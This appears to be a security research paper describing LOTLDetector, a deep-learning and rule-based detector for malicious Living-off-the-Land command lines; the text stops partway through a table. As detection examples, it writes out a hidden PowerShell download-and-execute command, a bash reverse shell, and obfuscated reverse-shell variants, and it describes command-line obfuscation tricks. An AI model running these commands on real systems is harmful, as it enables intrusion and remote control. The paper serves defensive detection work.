Abstract
In recent years, Living off the Land (LotL) attacks have drawn attention for their flexibility and the difficulty of detecting them. These attacks exploit legitimate tools already present on the system to conduct malicious activities, hiding malicious intent behind normal, benign programs. Existing detection methods for such attacks, however, rely largely on expert rules. While rule tags can effectively flag known attacks, they also produce a high false positive rate, resulting in low detection accuracy. To address these issues, we propose a detection system called LOTLDetector, which combines deep learning with expert rules to detect malicious command lines in LotL attacks from both the data and the knowledge perspective. LOTLDetector learns the semantics of command line text through neural networks and combines this with rule tags derived from expert knowledge, enabling more comprehensive detection of LotL attacks. We evaluated our method extensively, validating it on a Windows dataset of 27,448 command lines and a Linux dataset of 27,093 command lines, and compared it with existing methods. The results show that our method significantly outperforms existing methods in detecting malicious command lines: on the Linux dataset the system achieved an accuracy of 0.9728, and on the Windows dataset it reached 0.9598, about 8% higher than the best existing method. In addition, our project has been open-sourced.
Introduction
With the advancement of technology, the methods of cybercrime are constantly evolving, posing a serious threat to our digital lives. According to the CrowdStrike 2024 Global Threat Report (https://www.crowdstrike.com/global-threat-report/), attackers are increasingly using legitimate tools to execute attacks. The proliferation of this technique makes it difficult for existing security tools to distinguish normal activities from malicious ones. Moreover, since these tools are often used by system administrators for legitimate work and are added to the system's whitelist, defenders find it hard to block access to them completely. Attackers can therefore hide behind these benign programs, achieving their malicious goals while evading existing malware detection (Chen et al. 2024; Alsulami et al. 2017; Downing et al. 2021). As malware detection algorithms and methods improve, malware authors adopt equally sophisticated evasion mechanisms to counter them. LotL is one of the main evasion techniques used in malware attacks. Research by Barr-Smith et al. (2021) on Windows malware found that LotL techniques are widely used in Advanced Persistent Threat (APT) malware samples, with a prevalence rate of 26.26%. In short, attackers use a variety of methods to bypass the checks of security tools. For example, the malicious command "powershell -NoP -NonI -W Hidden -Exec Bypass 'IEX(New-Object System.Net.WebClient).DownloadFile('[REMOVED]', '$env: tempii.jse'); Invoke-Item "$env:tempii.jse"'" downloads a remote malicious script file through PowerShell and executes it with the Invoke-Item command. Even if this command is logged, it leaves very few traces, because it loads no profile (-NoP) and disables interactive mode (-NonI).
The log may record only a file download and a PowerShell execution, and among the vast volume of logs there are many such routine operations, making it difficult for security analysts to spot the anomaly. We refer to attacks that leverage pre-installed or later-installed binaries within a system to carry out malicious activities as Living off the Land (LotL) attacks (Liu et al. 2023). The binaries used in LotL attacks are called LOLBins (https://informationsecurityasia.com/zh-cn/what-is-lolbas/#real-world_instances_of_lolbas_attacks_and_their_consequences). Attackers primarily use these LOLBins for purposes such as proxy execution, reconnaissance, task termination, and registry modification, without leaving any binaries on disk.
LotL attacks exhibit several key characteristics: a minimal attack footprint, persistence, and the use of dual-use tools (Ning et al. 2023). For example, certutil.exe is a Windows command-line program intended for certificate management tasks; it can also download files from the Internet and encode or decode certificate files. Attackers can abuse the same tool to download malicious files or hide existing ones. Such methods may be used by sophisticated malware or by attackers after the initial intrusion. The dual-use nature of these tools lets attackers evade detection: the programs are usually whitelisted, and their use does not trigger alerts. In a report by Threatpost (https://threatpost.com/living-off-the-land-malicious-use-legitimate-utilities/177762/), Uptycs' threat research team found that the use of LOLBins across the stages of the MITRE ATT&CK framework (https://attack.mitre.org/) has increased significantly, precisely because LOLBins can bypass certain security restrictions, making them naturally attractive to cyber attackers. Using a LOLBin only requires typing the corresponding instruction into a command-line interface (CLI). Detecting LotL attacks therefore naturally reduces to detecting malicious command lines.
Current approaches to detecting malicious command lines fall roughly into two types. The first is traditional pattern matching based on rules extracted from expert knowledge (Boros et al. 2022). Its precision depends on how the rules are defined: rules that are too strict cause the number of false negatives (missed malicious command lines) to rise rapidly, while rules that are too broad cause the number of false positives to rise rapidly. Rule-based detection is also easy to bypass. The second type applies deep learning with natural language processing (Ongun et al. 2021; Yamin and Katt 2019; Hendler et al. 2018, 2020; Fang et al. 2021; Rusak et al. 2018; Ding et al. 2023; Yang et al. 2023). It extracts features from command line text easily, but the resulting rich feature set makes the model prone to overfitting and hurts its generalization ability.
In the course of this research, we also found that some malicious command lines change their text structure through obfuscation to bypass security tools. Although some work exists on de-obfuscation, it focuses almost entirely on PowerShell scripts (Li et al. 2019; Malandrone et al. 2021; Ugarte et al. 2019; Liu et al. 2018; Tsai et al. 2022); there is very little research on de-obfuscating command lines themselves. These de-obfuscation methods for PowerShell (https://docs.microsoft.com/en-us/powershell/scripting/overview) scripts can be roughly divided into two categories: those based on abstract syntax trees (AST) and those based on regular expressions. Since command line text is structurally much simpler than a script, we designed a multi-layer de-obfuscation algorithm based on regular expressions that targets the different obfuscation methods. After the collected raw command lines pass through this algorithm, we obtain clean, clear command line text.
In the subsequent research, we are, to our knowledge, the first to combine traditional rule matching with deep learning based on natural language processing to detect individual LotL attack commands. To address the false negatives of rule matching, we encode command line text into word vectors with natural language processing techniques and use deep learning to learn the relationships between the vectors, improving detection accuracy. However, feature learning based on word vectors may underfit, and the model is prone to misidentifying benign command lines as malicious. To mitigate this, we introduce rule extraction based on expert knowledge, using pattern matching to alleviate the deep learning model's false positives. With this dual approach, we detect LotL attack commands more effectively while reducing both false negatives and false positives. We also account for command lines that are benign in one context but malicious in another; we define such commands as suspicious. For example, "net view" can be used to list networked computers and shared resources, i.e., to see other active computers in the domain. During an attacker's lateral movement phase, however, this command is typically used to choose a lateral movement target. Combined with context analysis of the command line, it could be determined to be malicious; but since ordinary users also run it, in the absence of context we can only label it suspicious. When the model detects a suspicious command, it forwards the command to security analysts for analysis in conjunction with the surrounding log context.
We collected 27,520 Windows command line data and 27,003 Linux command line data in the enterprise operating environment.
The main contributions of our work can be summarized as follows:
To address the current gap in methods for deobfuscating command line text, we propose a multilayer de-obfuscation algorithm based on regular expressions to deal with different obfuscation methods of command lines.
We propose a new detection method that combines traditional rule matching with deep learning based on natural language processing to form a multi-feature source, to solve the problem of insufficient detection accuracy caused by the use of a single feature source.
We implement a three-class classification model for command lines instead of the traditional binary model, because the boundary between malicious and benign command lines is sometimes unclear. Some command lines may be benign in scenario A and malicious in scenario B; we consider these suspicious command lines. By surfacing suspicious command lines, analysts can better use context to make a judgment.
Related work
In this section, we analyze existing detection methods for LotL attacks, as summarized in Table 1, which covers existing research on detecting malicious command lines and malicious scripts. The table lists, for each study, the model, research object, focus, whether de-obfuscation techniques are involved, and whether rule-based detection is used. These studies range from simple character-level convolutional neural networks to complex combined Transformer and CNN-BiLSTM models. By comparing the models and methods of different studies, we can better understand the current progress and open challenges in this field. We also note that most research on detecting such attacks focuses on identifying malicious PowerShell script files rather than malicious command lines. Although malicious command lines are structurally much simpler than malicious scripts, both are composed of text, so the research methods are closely related. We therefore discuss the study of malicious scripts together with that of malicious command lines.
In the remainder of this section, we will review the detection methods for malicious command lines/malicious scripts from two perspectives: rule-based detection methods based on pattern matching and deep learning methods based on natural language processing techniques.
Table 1. Summary table of main related work
| Related work | Model | Research object | Focus | De-obfuscation | Rule |
|---|---|---|---|---|---|
| Hendler et al. | Character-level CNN, 4-layer CNN | PowerShell command line | Binary classification | | |
| Kels et al. | Token-char-level CNN | PowerShell script | Binary classification | | |
| Fang et al. | Random forest | PowerShell script | Binary classification | | |
| Ongun et al. | Random forest | Windows command line | Binary classification | | |
| Li et al. | AST | PowerShell script | De-obfuscation | | |
| Ding et al. | CNN | Linux command line | Binary classification | | |
| Boros et al. | Random forest | Windows command line, Linux command line | Binary classification | | |
| Yang et al. | Transformer-CNN-BiLSTM | PowerShell script | Multi-classification | | |
Pattern-based rule detection method
Rule-based detection methods, which leverage expert knowledge to predefine certain rules for the extraction of malicious command lines, are effective for detecting commands that match existing rules in the rule set. Boros et al. (2022) established a series of rule lists, essentially creating a rule library. When a new command-line text is encountered, the system checks the rule library for a matching rule. If a match is found, the corresponding label for that rule is returned; otherwise, a null value is returned. This rule-based detection is effective for command lines that have corresponding rules in the rule library.
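Concretely, such a rule library can be sketched as an ordered list of (pattern, label) pairs that returns the first matching label, or a null value when nothing matches. The patterns and labels below are illustrative toys of our own, not the actual ruleset of Boros et al. (2022):

```python
import re

# A toy rule library: (rule name, compiled pattern, label).
# These example rules are hypothetical, for illustration only.
RULES = [
    ("encoded-powershell", re.compile(r"powershell.*-enc(odedcommand)?\b", re.I), "malicious"),
    ("certutil-download", re.compile(r"certutil.*-urlcache.*-split", re.I), "suspicious"),
]

def match_rules(cmdline):
    """Return the label of the first matching rule, or None (the 'null value')."""
    for name, pattern, label in RULES:
        if pattern.search(cmdline):
            return label
    return None
```

As the surrounding text notes, such a lookup is fast and precise for known patterns but returns nothing for any command line outside the rule library.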
However, the main limitation of this method is that attackers can easily use obfuscation techniques to alter the original structure of malicious command lines, rendering the rule-based detector ineffective. By obfuscating the command line, attackers can bypass the detection mechanisms that rely on pattern matching against known rules.
Deep learning methods based on natural language processing techniques
Deep learning methods based on Natural Language Processing (NLP) techniques utilize NLP technologies such as Word2Vec and FastText to semantically analyze command line texts in conjunction with their contextual information and extract key features. These features are then combined with deep learning models to train classifiers for identifying malicious command lines. Hendler et al. (2018) implemented a character-level convolutional neural network detector for the detection of malicious PowerShell command lines. Hendler et al. (2020) used Word2Vec and FastText for context embedding and fed these embeddings into a deep neural network for the detection of malicious PowerShell code. Fang et al. (2021) leveraged FastText for PowerShell script embedding, combined with extracted text features, token features, and AST node features, employing a random forest classifier for classification. Ongun et al. (2021) utilized Word2Vec word embedding technology to represent command line texts and employed an active learning framework to iteratively select a set of uncertain and anomalous samples for human analysts to label. Ding et al. (2023) represented Linux command line texts through Word2Vec word embedding technology and then used a TextCNN model to detect malicious Linux command lines. Yang et al. (2023) extracted four different features of PowerShell scripts and constructed a combination model based on transformer and CNN-BiLSTM for PowerShell family detection.
Background knowledge
Living off the land (LotL)
Advanced Persistent Threat (APT) attacks are complex, ongoing cyberattacks in which well-organized attackers operate over a long period. They use stealth and evasion techniques, such as zero-day exploits, causing significant security threats and economic losses worldwide. According to a report by Symantec (Wueest et al. 2017), APT attacks that primarily employ the Living off the Land (LotL) method show a continuous upward trend. Attackers can exploit pre-installed or later-installed binaries within the system to carry out malicious activities; because these tools are also used by system administrators for legitimate work, defenders find it difficult to block access to them completely, allowing attackers to hide in plain sight. This makes anomalies hard to detect even when log files are generated. Alternatively, simple scripts and shellcode can be run directly in memory, so fewer new files are created on disk, reducing the risk of detection by traditional security tools.
LotL attackers rely on existing tools to carry out malicious operations while blending into the system's daily tasks without triggering additional alerts. Misusing clean system tools can bypass many protective mitigations, such as application whitelisting. According to Victor Fang's blog (Fang 2018), attackers on the Windows platform prefer to exploit PowerShell because it can be used to install backdoors, execute malicious code, and carry out other attacks. Moreover, any scripts used in an attack can be obfuscated with simple techniques, leaving traditional signature-based static detection almost unable to detect them. For attackers, the advantage of scripts is that they can be updated and modified quickly without a long development cycle, making them flexible and easy to customize to the target environment. Together, these factors cause significant reliability problems for many traditional security solutions in preventing LotL attacks.
Text embedding
In recent years, several methods for embedding words into vectors have been proposed (Mikolov 2013; Devlin et al. 2018; Joulin et al. 2016). These methods leverage large corpora of text documents (such as Wikipedia articles) to derive vector representations of words in Euclidean space from the contexts in which they appear. These embedding methods have become more popular than traditional one-hot encoding in various NLP tasks because they project semantically similar words to nearby vectors in the embedding space.
The representation of text data in machine learning tasks has been widely studied. Since machine learning models require numerical input, the tokens in the text must be mapped into a numerical space. Our detector therefore adopts a context embedding method called Word2Vec, a technique that represents individual words as n-dimensional numerical vectors, with each word's contextual information embedded in the resulting vector; semantically similar words lie close together in the embedding space. During training, Word2Vec can use one of two algorithms: CBOW, which predicts a token from its context, or skip-gram, which predicts the context of a given token. In this work, we use the vectors generated by this embedding technique to represent command line text for training machine learning models. Word2Vec has one drawback, however: it cannot vectorize words that were not seen during training. Our strategy for this situation is to assign a random vector to each unseen word.
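This lookup-with-random-fallback strategy can be sketched as follows. The embedding table below is a random stand-in for a trained Word2Vec model (in practice it would come from, e.g., gensim), and the token names are purely illustrative:

```python
import numpy as np

DIM = 8  # embedding dimension (kept tiny for illustration)
rng = np.random.default_rng(0)

# Stand-in for a trained Word2Vec table keyed by command-line tokens.
embedding = {
    "powershell": rng.standard_normal(DIM),
    "-nop": rng.standard_normal(DIM),
}

def vectorize(token):
    """Look up a token's vector; unseen tokens get a random vector,
    cached so repeated occurrences map to the same vector."""
    if token not in embedding:
        embedding[token] = rng.standard_normal(DIM)
    return embedding[token]

# A command line becomes a matrix with one row per token.
matrix = np.stack([vectorize(t) for t in "powershell -nop -unseenflag".split()])
```

Caching the random vector keeps the representation stable within a session; a real system might instead persist these vectors or fall back to a subword model such as FastText.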
Deep learning
In this section, we provide background on the concepts and architectures of deep learning, which is essential for understanding the deep learning-based malicious command line detector introduced in the "System Design" section.
Convolutional neural network (CNN)
CNN is a learning architecture commonly applied in the field of computer vision. However, in our scenario, the research object is text, which belongs to the domain of Natural Language Processing (NLP). Therefore, we typically add an embedding layer in front of the convolutional layer to transform a command-line text into a matrix of word vectors. The main components of CNN include the convolutional layer, pooling layer, and fully connected layer (Rakhlin 2016).
The workflow of the convolutional layer can be described as follows: assuming the input word vector matrix has the shape of m*n (m represents the dimension of the word vector, and n represents the length of the command line text). The convolutional layer uses multiple different integers k to construct multiple convolutional kernels of different shapes k*m (m is the dimension of the word vector). As the convolutional kernel slides over the word vector matrix, the k*m weight parameters in the kernel perform a dot product with the corresponding k*m parameters at the same position in the word vector matrix, and the results are summed up. When this convolutional kernel traverses the entire word vector matrix with a stride of s, we obtain a feature vector.
The pooling layer primarily serves to reduce the dimensionality of the data, lower computational complexity, and extract features while retaining important information. Typically, there are maximum pooling and average pooling. The maximum pooling operation selects the maximum value within the pooling window as the output, which means that only the most salient features are retained, and other secondary features are ignored. The average pooling operation calculates the average value of all values within the pooling window as the output, which means that the average feature value within the pooling window is preserved. In our work, we choose the maximum pooling operation for feature extraction because it can extract the most prominent features while reducing the risk of overfitting. Finally, the fully connected layer connects the features processed by the pooling operation together.
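As a concrete illustration, the sliding dot product and max pooling described above can be written in a few lines of NumPy. This is a single-kernel sketch with a configurable stride, not the full multi-kernel TextCNN with learned weights:

```python
import numpy as np

def conv_maxpool(X, kernel, stride=1):
    """Slide a k*m kernel over an n*m word-vector matrix (n tokens, each an
    m-dimensional vector), summing the elementwise products at each position,
    then apply global max pooling over the resulting feature vector."""
    n, m = X.shape
    k, m_k = kernel.shape
    assert m == m_k, "kernel width must equal the word-vector dimension"
    feature_vector = [float(np.sum(X[i:i + k] * kernel))
                      for i in range(0, n - k + 1, stride)]
    return max(feature_vector)  # max pooling keeps the most salient feature
```

With three 2-dimensional token vectors and an all-ones 2x2 kernel, the two window sums are 2.0 and 3.0, and max pooling keeps 3.0.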
Transformer
The Transformer(Vaswani 2017) model is primarily composed of two parts: the Encoder and the Decoder. Since our task is a classification task, not a generative task, we do not need to utilize the Decoder part. Therefore, we will focus on introducing the Encoder part of the Transformer. In the Transformer model, the Encoder consists of multiple identical layers stacked on top of each other, each containing two sub-layers: the self-attention mechanism and the feed-forward neural network. The self-attention mechanism calculates the attention that each position in the input sequence pays to other positions, thereby capturing the dependencies within the sequence. The feed-forward neural network then performs a non-linear transformation on the output of the self-attention mechanism to extract higher-level features. During the operation of the Encoder, the input sequence first undergoes processing by the self-attention mechanism to obtain attention weights for each position relative to other positions. These weights are then used to weight the input sequence to obtain a weighted representation. Subsequently, this weighted representation is fed into the feed-forward neural network for further processing to obtain the final output of the Encoder. In our task, the main components of the Transformer that we use are position encoding, multi-head self-attention mechanism, residual connections and normalization, and the feed-forward neural network.
Positional Encoding: Positional encoding is added after the word vectors in the input sequence to retain the positional information within the sequence. Positional encoding is typically obtained by incorporating the values of sine and cosine functions into the word vectors.
Multi-Head Self-Attention Mechanism: In each encoder layer, the input sequence goes through a multi-head self-attention mechanism, which includes linear transformations of queries, keys, and values. Then, self-attention scores are calculated, and the values are weighted and summed according to these scores, allowing the model to capture positional dependencies between different positions in the sequence.
Residual Connections and Normalization: Residual connections and normalization are applied after each sub-layer, allowing the input signal to bypass the sub-layer and be passed on to subsequent layers. This helps alleviate the problems of vanishing and exploding gradients, accelerating the training speed of the model.
Feed Forward Neural Network: This involves performing two layers of linear mapping on the network tensors and then activating them through an activation function.
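The sinusoidal positional encoding mentioned above can be computed directly from the formulas in Vaswani (2017); this sketch assumes an even model dimension:

```python
import numpy as np

def positional_encoding(seq_len, d_model):
    """Sinusoidal positional encoding: even dimensions carry sine values,
    odd dimensions carry cosine values (d_model assumed even)."""
    pos = np.arange(seq_len)[:, None]          # (seq_len, 1) positions
    i = np.arange(0, d_model, 2)[None, :]      # even dimension indices
    angles = pos / np.power(10000.0, i / d_model)
    pe = np.zeros((seq_len, d_model))
    pe[:, 0::2] = np.sin(angles)
    pe[:, 1::2] = np.cos(angles)
    return pe
```

At position 0 the encoding alternates 0 (sine) and 1 (cosine); in practice this matrix is added to the word-vector matrix before the first encoder layer.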
Command line code obfuscation
The term "obfuscation" refers to techniques by which attackers modify the structure of command line code through obfuscation frameworks (https://github.com/danielbohannon/revoke-obfuscation, https://github.com/danielbohannon/invoke-dosfuscation) without changing its semantics, aiming to prevent security analysts from determining its execution purpose. These obfuscation strategies are particularly effective against signature-based detectors. In real-world cyber attacks, attackers often obfuscate command lines to bypass system restrictions and the detection of security tools. This requires us to de-obfuscate command line samples before feature extraction; extracting features from unprocessed raw data would greatly reduce their effectiveness. Based on a report by FireEye (https://i.blackhat.com/briefings/asia/2018/asia-18-bohannon-invoke_dosfuscation_techniques_for_fin_style_dos_level_cmd_obfuscation-wp.pdf) and existing work on de-obfuscating PowerShell commands (Liu et al. 2018; Ugarte et al. 2019; Malandrone et al. 2021; Li et al. 2019), we summarize the common command line obfuscation methods into the following four major categories:
Encoding Obfuscation: Attackers encode parts or all of the command line using methods like Base64, Unicode, Hex, or Octal encoding, or alternate capitalization to disguise the text and bypass certain security devices. To counter this, regular expressions can be used to identify different encoding schemes and appropriate decoding algorithms can be applied to deobfuscate the encoded sections.
Command Line Insertion Obfuscation: By inserting special characters such as " ; () and spaces into the command line, attackers can disrupt the parsing and understanding of the command line structure by security tools. Although the text appears different from the original, it has the same effect when executed. For this type of obfuscation, regular expressions can be used to match predefined special characters and replace them with a single space.
Command Line Logical Obfuscation: Attackers may break down the command line text into a list of strings and then reassemble a new command line using format specifiers during execution.
Hybrid Command Line Operation Obfuscation: This method combines various string operations, such as string insertion, Base64 encoding, and string replacement. For this type of multifaceted obfuscation, the strategy is to apply the de-obfuscation strategies for individual obfuscation methods sequentially.
Table 2. Description of obfuscation methods and corresponding examples
| ID | Description | Example |
|---|---|---|
| 1 | Encode parts of the command line text using Base64. | IEX(IWR aHR0cHM6Ly9leGFtcGxlLmNvbQ==); Invoke-ConPtyShell 192.168.52.129 9000 |
| 2 | Insert special characters. | I^^^^E^X(I^WR https://example.com); I^nvoke-ConPtyShell 192.168.52.129 9000 |
| 3 | Split and reassemble the command line text using dollar-sign ($) variables. | $a = IEX(IWR https://; $b = example.com); $c=Invoke-ConPtyShell 192.168.52.129 9000; $a+$b+$c |
| 4 | Combine several of the aforementioned obfuscation methods. | I^^^E^X(I^WR aHR0cHM6Ly9leGFtcGxlLmNvbQ==); I^nvoke-ConPtyShELL 192.168.52.129 9000 |
System Design
To address the current issues in malicious command-line detection, we first design and implement a deep learning detector based on multi-feature fusion called the LOTLDetector to detect malicious command lines. The overall architecture of the LOTLDetector is shown in Fig. 1. The LOTLDetector mainly consists of four stages: data preprocessing, feature extraction, feature encoding, and feature learning.
[See PDF for image]
Fig. 1
Architecture of the LOTLDetector
Data Preprocessing: During actual attacks, attackers often use obfuscation techniques to encode originally clear and understandable command line texts into structures that are unclear and not conducive to understanding, in order to evade the detection of security tools. After obtaining the original command line input data, the LOTLDetector first goes through a multilayer de-obfuscation algorithm we designed to obtain command line texts that are structurally clear and easy for security analysts to understand. Then, in the standardization phase, regular expressions are used to match some common texts in the command line and replace them with the same token, thereby reducing the complexity of the command line structure. Finally, the preprocessed data is divided into training, validation, and test datasets.
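The standardization step can be sketched with a few regular expressions. The replacement tokens (<URL>, <IP>, <PATH>) are placeholders of our own choosing, not necessarily the exact tokens LOTLDetector uses:

```python
import re

# Illustrative normalization patterns, applied in order (URL before IP so
# that addresses inside URLs are not re-matched).
PATTERNS = [
    (re.compile(r"https?://\S+"), "<URL>"),
    (re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"), "<IP>"),
    (re.compile(r"[A-Za-z]:\\[^\s\"']+"), "<PATH>"),
]

def standardize(cmdline):
    """Replace common variable substrings with fixed tokens to reduce
    the structural complexity of the command line."""
    for pattern, token in PATTERNS:
        cmdline = pattern.sub(token, cmdline)
    return cmdline
```

Collapsing variable substrings this way shrinks the vocabulary the embedding model must learn, at the cost of discarding the concrete values.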
Feature Extraction: In this stage, three types of features are extracted. The first type involves matching predefined rules to obtain a series of rule tags. The second type uses natural language processing techniques to tokenize the command line, resulting in a series of word level tokens. Lastly, a database of known malicious command lines is constructed to compare the new command line with the command lines in the database for text similarity, resulting in similarity tags.
Feature Encoding: The features extracted in the feature extraction phase are transformed into vectors for subsequent learning by the neural network model. The LOTLDetector uses Word2Vec to map the three different command line features into vectors, resulting in three embedding representation methods: Token2Vec, Rule2Vec, and Similarity2Vec. Because the semantic features of command-line provided from multiple dimensions are richer than those from a single dimension, we opt to combine features from three different dimensions: Token2Vec, Rule2Vec, and Similarity2Vec. By fusing these features, we create a new fusion vector. This vector offers a more comprehensive embedding representation for subsequent command-line detection.
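Assuming each of the three feature sources yields a fixed-length vector, one straightforward fusion scheme is concatenation. The dimensions below are arbitrary stand-ins; the text does not fix them here:

```python
import numpy as np

rng = np.random.default_rng(0)

# Stand-ins for the three embeddings; real vectors would come from Word2Vec
# models over tokens, rule tags, and similarity tags respectively.
token_vec = rng.standard_normal(64)  # Token2Vec
rule_vec = rng.standard_normal(16)   # Rule2Vec
sim_vec = rng.standard_normal(16)    # Similarity2Vec

# Fuse the three views into a single representation by concatenation.
fusion_vec = np.concatenate([token_vec, rule_vec, sim_vec])
```

The fused vector then serves as the input representation for the feature-learning stage.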
Feature Learning: We construct a combined Transformer and TextCNN model to learn from the fusion vector obtained in the feature encoding phase, thereby detecting malicious command lines. The Transformer attends to the global information of a sample, while the TextCNN focuses on local information, so their combination achieves results that neither model can reach alone. The main function of the LOTLDetector is to identify malicious command lines; we combine the common uses of system binaries with the ATT&CK framework to divide command line labels into three categories. A detailed introduction is given in later sections.
Data preprocessing
De-obfuscation
Due to the obfuscation techniques introduced earlier, the syntactic structure of the original command line code is greatly weakened, making it difficult for classification models to recognize the original features and lowering accuracy. To obtain a high-quality command line dataset, we implemented a corresponding de-obfuscation algorithm for each type of obfuscation. We introduce the de-obfuscation strategy for each method in detail below.
Encoding Obfuscation: Attackers encode command line code, which is easy for security analysts to understand, into a form that is difficult to comprehend by using other encoding schemes. Since each encoding method has a certain form, as shown in Algorithm 1, we first identify the possible encoding method, and then call the corresponding decoding function of this possible encoding method to complete the de-obfuscation of command line code obfuscation.
[See PDF for image]
Algorithm 1
De-obfuscation of encoding obfuscation
Command Line Insertion Obfuscation: Attackers insert special characters into the middle of the command line code to segment the command line. However, because the Windows command interpreter can automatically remove these special characters when executing command line code, signature-based security detection tools fail to function effectively at this point. As shown in Algorithm 2, we use regular expressions to match the special characters in the command line code that are used to segment the command line. When the special characters are successfully matched, they are replaced with spaces.
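A minimal sketch of the replacement step in Algorithm 2, assuming the "special characters" include the caret and double quote that the Windows command interpreter strips before execution:

```python
import re

# Illustrative set of inserted characters that cmd.exe removes at execution.
SPECIAL = re.compile(r'[\^"]')

def deobfuscate_insertion(cmd: str) -> str:
    cleaned = SPECIAL.sub(' ', cmd)              # replace matched characters with spaces
    return re.sub(r'\s+', ' ', cleaned).strip()  # collapse the resulting runs of spaces
```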
[See PDF for image]
Algorithm 2
De-obfuscation of insertion obfuscation
Command Line Logical Obfuscation: For this type of obfuscation, as shown in Algorithm 3, we first identify variables that begin with the ’$’ symbol in the command line. Then, following the order in which the variable names are concatenated in the command line, we reconstruct a new command line code that is easier for security analysts to understand.
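The variable-reconstruction step of Algorithm 3 might be sketched as follows; the PowerShell-style `$var='...'` assignment syntax and the simple `$a+$b` concatenation pattern are illustrative assumptions:

```python
import re

def deobfuscate_logic(cmd: str) -> str:
    """Resolve string variables and splice them back in concatenation order."""
    # Collect assignments of the form $name='value'.
    assigns = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", cmd))

    def splice(match):
        # Rebuild a $a+$b+... concatenation in the order the names appear.
        parts = re.findall(r'\$(\w+)', match.group(0))
        return ''.join(assigns.get(p, '$' + p) for p in parts)

    return re.sub(r'\$\w+(?:\s*\+\s*\$\w+)+', splice, cmd)
```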
[See PDF for image]
Algorithm 3
De-obfuscation of command line logic obfuscation
Hybrid Command Line Operation Obfuscation: In some malicious samples, we have also discovered a very complex obfuscation method that combines various string operations (for example, command line insertion obfuscation, command line logical obfuscation, and encoding obfuscation) to bypass security checks and achieve malicious purposes. For this type of obfuscation, we therefore adopt the following steps to de-obfuscate the command line code, as shown in Algorithm 4.
Step 1: First, de-obfuscate the command line logic, reconstructing concatenated variables into a readable command line. We implement this step by calling Algorithm 3.
Step 2: Next, de-obfuscate the command line insertion. In this step, all special symbols are replaced with spaces so that leftover special symbols do not cause the subsequent decoding step to fail. We implement this step by calling Algorithm 2.
Step 3: Then, de-obfuscate the encoding obfuscation, decoding the remaining encoded content into a form readable by security analysts. We implement this step by calling Algorithm 1.
Step 4: Finally, obtain the clean command line code.
[See PDF for image]
Algorithm 4
De-obfuscation of Mixing Command Line Operations Obfuscation
Normalization
In this step, regular expressions are used to quickly match and identify command line arguments that can be standardized within the command line text. We use the five regular expressions shown in Table 3 to match five kinds of command line argument objects. Since different command lines can use different binaries, access different paths, and contact different IP addresses, parameters such as IP addresses share the same form but differ in value. We therefore replace different IP addresses with a single identifier, using a "private_ip" tag for private addresses like 192.168.1.1 and a "public_ip" tag for public addresses. Binary files invoked in command lines usually carry path information that is largely redundant, so we match it with a regular expression and replace it with a filepath tag. Finally, numbers and URL addresses in the command line arguments are matched and replaced with number and url tags, respectively.
At the same time, command lines will also contain uppercase and lowercase letters. In this stage, we need to convert all uppercase letters to lowercase because "TEMP" and "temp" express the same meaning to us, but the word vector model will not know that these two words express the same meaning during training. As a result, the model will generate two different word vectors, which will reduce the effectiveness of the word vector features during model training.
The reason for replacing these command line arguments with tags is that the information contained in these argument objects is not very prominent, and the similarity of these argument information is very high among different command lines. Replacing these highly similar objects with a unified tag can reduce the difficulty of the Word2Vec word vector model training, while also making the word vector features trained by the model more prominent.
Table 3. Regular expressions for matching different command line objects
Label | Regex | Examples |
|---|---|---|
private_ip | \b(?:10|172\.(?:1[6-9]|2[0-9]|3[0-1])|192\.168)\.\d{1,3}\.\d{1,3}\b | 192.168.3.1 |
public_ip | \b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b | 5.5.5.5 |
number | \b\d+\b | 12345 |
filepath | ^([a-zA-Z]:(\\[^\\/:*?"<>|]+)*\\[^\\/:*?"<>|]+\.[^\\/:*?"<>|]+,)*[a-zA-Z]:(\\[^\\/:*?"<>|]+)*\\[^\\/:*?"<>|]+\.[^\\/:*?"<>|]+$ | C:\Program Files\ExampleFile.txt |
url | ^(https?|ftp)://(www\.)?([a-zA-Z0-9-]+\.)*[a-zA-Z0-9]+(\.[a-z]{2,6})(:[0-9]+)?(/[^\s]*)?$ | https://example.com/index.html |
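The normalization pass described above can be sketched as follows. The regexes here are simplified stand-ins for those in Table 3, and ordering the more specific patterns before the generic ones is our assumption:

```python
import re

# Simplified stand-ins for the Table 3 regexes; more specific rules first.
RULES = [
    ('private_ip', re.compile(r'\b(?:10|172\.(?:1[6-9]|2[0-9]|3[01])|192\.168)(?:\.\d{1,3}){2,3}\b')),
    ('url',        re.compile(r'\b(?:https?|ftp)://\S+', re.I)),
    ('public_ip',  re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')),
    ('filepath',   re.compile(r'\b[a-zA-Z]:\\[^\s"<>|]+')),
    ('number',     re.compile(r'\b\d+\b')),
]

def normalize(cmd: str) -> str:
    cmd = cmd.lower()  # fold case so "TEMP" and "temp" share one embedding
    for label, pattern in RULES:
        cmd = pattern.sub(label, cmd)
    return cmd
```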
Feature extraction
Rule extraction
Security experts, when analyzing whether a command line is malicious, usually start from certain security knowledge, such as checking which binary files the command line uses, which paths it accesses, which IP addresses or domain names it contacts, and what its parameters are. For example, the command "bash -i>& /dev/tcp/192.168.1.1/9999 0> &1", which performs a reverse shell on a Linux system, is easily recognized as malicious by a security expert. A deep learning model, however, requires complex training to reach the same judgment. To provide more effective features for subsequent model training, we established a rule library for malicious command lines based on expert knowledge. The rule library contains three lists that store different rules of the command line: the command line path, the command used in the command line, and the parameters of the command line. For the example command line above, the path list in the rule library stores "/dev/tcp", the command list stores "bash", and the parameter list stores "-i> &" and "0> &1".
Thus, to more effectively identify and analyze potential malicious command lines, we have designed some special tags based on the aforementioned rules. As shown in Table 4, we have designed three types of rule extraction tags, which include the command line path, the command used in the command line, and the parameters of the command line. Therefore, for the example command-line mentioned above, the returned tags would be "path_/dev/tcp", "command_bash", "parameter_-i> &", and "parameter_0> &1".
Table 4. Description of rule label extraction types and corresponding examples
Rule label | Description | Examples |
|---|---|---|
path_keyword | When a path matches one of the predefined paths in the ruleset, it prefixes the path with ’path’ as the return label. | path_/dev/mem |
command_keyword | When a command matches one of the predefined commands in the ruleset, it prefixes the command with ’command’ as the return label. | command_kill |
